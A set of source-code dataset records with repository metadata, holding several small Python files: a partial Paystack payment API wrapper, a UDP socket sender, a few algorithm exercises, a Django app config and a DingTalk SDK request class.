38355cde10cce1c38b527f4881ae08e583000a80
|
978b3484a069de59033bfa21ae4ea9db033c4b7c
|
/djpaystack/transaction.py
|
2133e2de97046b7200787420e4fb45cf8d2292af
|
[] |
no_license
|
boiyelove/hookup
|
3b83223bf8c9a3b407a0c2f3d4f3496de01fcbee
|
59d44ce353d9f4f079e31b904da59e8185a8f401
|
refs/heads/master
| 2023-03-20T20:38:18.233708
| 2021-03-16T13:08:02
| 2021-03-16T13:08:02
| 140,166,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,634
|
py
|
from .base import Base
from .settings import TRANSACTIONURL
class Transactions(Base):
def __init__(self):
super(Transactions, self).__init__()
self.baseurl = TRANSACTIONURL
def initialize(reference='', amount=0, email=''):
'''
PAYSTACK TRANSACTION API
Initialize Transaction
curl https://api.paystack.co/transaction/initialize \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"reference": "7PVGX8MEk85tgeEpVDtD", "amount": 500000, "email": "customer@email.com"}' \
-X POST
'''
raise NotImplementedError('You have not done this yet')
def charge_auth(self, auth_code='', email='', amount=0):
'''
Charge Authorization
curl https://api.paystack.co/transaction/charge_authorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
raise NotImplementedError('You have not done this yet')
def re_auth(self):
'''
Request Reauthorization
curl https://api.paystack.co/transaction/request_reauthorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
return ''
def check_auth(self, auth_code='', email='', amount=0):
'''
Check Authorization
curl https://api.paystack.co/transaction/check_authorization \
-H "Authorization: Bearer SECRET_KEY" \
-H "Content-Type: application/json" \
-d '{"authorization_code": "AUTH_72btv547", "email": "bojack@horsinaround.com", "amount": 500000}' \
-X POST
'''
return ''
def verify(self, reference_code):
'''
Verify transaction
curl https://api.paystack.co/transaction/verify/DG4uishudoq90LD \
-H "Authorization: Bearer SECRET_KEY"
'''
return self.execute(endpoint = ('/verify/' + reference_code))
def verify_by_customer(self, plan_code=None, reference_code=None, email=None, customer_id=None, customer_code=None):
data = self.verify(reference_code)
if customer_id: ver_measure = customer_id
elif customer_code: ver_measure = customer_code
elif email: ver_measure = email
else:
raise TypeError('email or customer_detail cannot be null')
# if (plan_code == data['plan'] ) and (email== data['customer']['email']) : pass
cus = data['customer']
auth = data['authorization']
plan = data['plan']
if ((cus['email'] == email) and (data['plan'] == plan_code)):
return True
return False
def get_auth(self):
return self.payload['authorization']
def get_customer(self):
return self.payload['authorization']
def get_plan(self):
return self.payload['plan']
def fetch(self, id=0):
'''
Fetch Transaction
curl "https://api.paystack.co/transaction/2091" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def timeline(self, id=0):
'''
View transaction Timeline
curl https://api.paystack.co/transaction/timeline/21002R319U5139 \
-H "Authorization: Bearer SECRET_KEY"
'''
return ''
def totals(self, user=None):
'''
Transaction Totals
curl "https://api.paystack.co/transaction/totals" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def user_totals(self, customer_id):
self.data = {'customer': customer_id, 'status': 'success'}
self.execute()
rmeta = self.payload['meta']
# f = open('data.json', 'w+')
# f.write(str(self.payload))
# f.close()
print(self.payload)
amount = 0
# for item in self.payload['data']:
# amount += item['amount']
return rmeta["total_volume"]
# return amount
def export(self):
'''
Export Transaction
curl "https://api.paystack.co/transaction/export" \
-H "Authorization: Bearer SECRET_KEY"
-X GET
'''
return ''
def verify_transaction(ref_code='', email='', plan_code = ''):
transaction_url = 'https://api.paystack.co/transaction/verify/'
if ref_code == '':
raise ValueError('please provide a referece code')
transaction_url += ref_code
r = self.requests.get(transaction_url, headers=self.header)
r = r.json()
print(r)
if r['status']:
data = r['data']
cus = data['customer']
auth = data['authorization']
plan = data['plan']
print(cus['email'],email,data['plan'], plan_code)
print(type(cus['email']),type(email),type(data['plan']), type(plan_code))
print('True0 True0')
if ((cus['email'] == email) and (data['plan'] == plan_code)):
print('True')
return True
print('False')
return False
|
[
"daahrmmieboiye@gmail.com"
] |
daahrmmieboiye@gmail.com
|
e10440c3b022311e7e3f8255e41e920a81620a1b
|
c6d84655a8424c8ade139fd79ae1bbb1514f8c88
|
/05socket/udp_producer.py
|
c8f3cd16854e8e3a5104c25dece2780513a69411
|
[] |
no_license
|
eryeer/pythonStudy
|
64240934ce463e7e9714fc7f0d7a6608cefab837
|
5c6a69ef10c0df38f89aee7e5d5cc9802a2b424b
|
refs/heads/master
| 2020-04-08T15:16:19.579466
| 2019-04-15T06:13:41
| 2019-04-15T06:13:41
| 159,472,137
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
import socket
def test(a: str, b: int) -> int:
print(a)
print(b)
return b
def main():
# test("1", 2)
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_socket.bind(("", 7890))
# udp_socket.sendto(b"hahaha", ("localhost", 8080))
while True:
send_data = input("input send message")
if send_data == "exit":
udp_socket.close()
return
udp_socket.sendto(send_data.encode("utf-8"), ("localhost", 8080))
if __name__ == '__main__':
main()
|
[
"eryeer@163.com"
] |
eryeer@163.com
|
a9642d6c74ccc57e476b12e9fcc18c36bc7a0d0f
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02913/s870183594.py
|
9f40aaa7f32fff9e55ca4ec7a16c32dad0b4c50a
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 479
|
py
|
M = int(input())
T = input()
ans = 0
for l in range(M):
i, j = 1, 0
S = T[l:]
N = M-l
Z = [0]*N
Z[0] = N
while i < N:
while i+j < N and S[j] == S[i+j]:
j += 1
Z[i] = j
if j == 0:
i += 1
continue
k = 1
while i+k < N and k+Z[k] < j:
Z[i+k] = Z[k]
k += 1
i += k
j -= k
for i in range(N):
ans = max(ans, min(i, Z[i]))
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
f845ef1a170fda7ca4deb266135c6e317c07867c
|
f61ab4deaa5e5bd5171bb28854eaa6eacdc95a4c
|
/Instuiteapp/apps.py
|
7d961d172cbea670f828f552d7a799f9eb80e6de
|
[] |
no_license
|
Adi19471/Institute_djangomvtadi_DJANGO
|
dfd67237bc4ca129f84fa62f15bcc17b1d4585ea
|
f4ce3f1c58a7e152d6011583d287be577f967cce
|
refs/heads/master
| 2023-07-22T17:03:59.781683
| 2021-09-11T07:25:45
| 2021-09-11T07:25:45
| 403,988,727
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 154
|
py
|
from django.apps import AppConfig
class InstuiteappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'Instuiteapp'
|
[
"akumatha@gmail.com"
] |
akumatha@gmail.com
|
c5416e6dd1cf97f29485ef6dcc297e53adb103b7
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/算法小抄/打家劫舍/打家劫舍2.py
|
86f4e208511f26cebd8d468f2cb207d132ffe41b
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316
| 2022-09-01T08:20:37
| 2022-09-01T08:20:37
| 95,668,066
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,410
|
py
|
"""
你是一个专业的小偷,计划偷窃沿街的房屋,每间房内都藏有一定的现金。这个地方所有的房屋都围成一圈,这意味着第一个房屋和最后一个房屋是紧挨着的。同时,相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。
给定一个代表每个房屋存放金额的非负整数数组,计算你在不触动警报装置的情况下,能够偷窃到的最高金额。
示例 1:
输入: [2,3,2]
输出: 3
解释: 你不能先偷窃 1 号房屋(金额 = 2),然后偷窃 3 号房屋(金额 = 2), 因为他们是相邻的。
示例 2:
输入: [1,2,3,1]
输出: 4
解释: 你可以先偷窃 1 号房屋(金额 = 1),然后偷窃 3 号房屋(金额 = 3)。
偷窃到的最高金额 = 1 + 3 = 4 。
"""
from typing import List
class Solution:
def rob(self, nums: List[int]) -> int:
def robRange(start, end) -> int:
dp1, dp2 = 0, 0
for i in range(end, start - 1, -1):
dp2, dp1 = dp1, max(dp1, dp2 + nums[i])
return dp1
length = len(nums)
if length == 1:
return nums[0]
return max(robRange(0, length - 2), robRange(1, length - 1))
if __name__ == '__main__':
nums = [2, 3, 2]
sol = Solution()
result = sol.rob(nums)
print(result)
|
[
"sqw123az@sina.com"
] |
sqw123az@sina.com
|
2b258251be54698c7cf7f09390b9b22df7e3c439
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_089/ch151_2020_04_13_20_49_15_933281.py
|
d9c04612c3fb56edfc9d41e6d501ee71b350565e
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 469
|
py
|
def classifica_lista(x):
resultado = []
if x == [] or len(x) < 2:
return "nenhum"
i = 0
while i < len(x):
if x[i] > x[i+1]:
i += 1
resultado.append('d')
if x[i] < x[i+1]:
i += 1
resultado.append("c")
if "d" and "c" in resultado:
return "nenhum"
if "d" not in resultado:
return "crescente"
if "c" not in resultado:
return "decrescente"
|
[
"you@example.com"
] |
you@example.com
|
99252c919df613b170478deccf524a3f1ddbee2c
|
3d62a14eb69baea0737f8c093336cbf6380b30a7
|
/dingtalk/api/rest/OapiEduSubDataGetRequest.py
|
99501c9ebbb090accf9eaf4d2e957ecccaccf64e
|
[] |
no_license
|
KangSpace/message_plus_server
|
50cbc55c296d5e835a0c6f99f45cf699f6806add
|
300954993f44648db3a2124d587533656d970d6c
|
refs/heads/main
| 2023-05-01T15:08:18.195400
| 2021-05-27T04:41:56
| 2021-05-27T04:41:56
| 361,338,925
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
'''
Created by auto_sdk on 2021.01.29
'''
from dingtalk.api.base import RestApi
class OapiEduSubDataGetRequest(RestApi):
def __init__(self,url=None):
RestApi.__init__(self,url)
self.orders = None
self.page_num = None
self.page_size = None
self.stat_date = None
def getHttpMethod(self):
return 'POST'
def getapiname(self):
return 'dingtalk.oapi.edu.sub.data.get'
|
[
"kango2gler@gmail.com"
] |
kango2gler@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.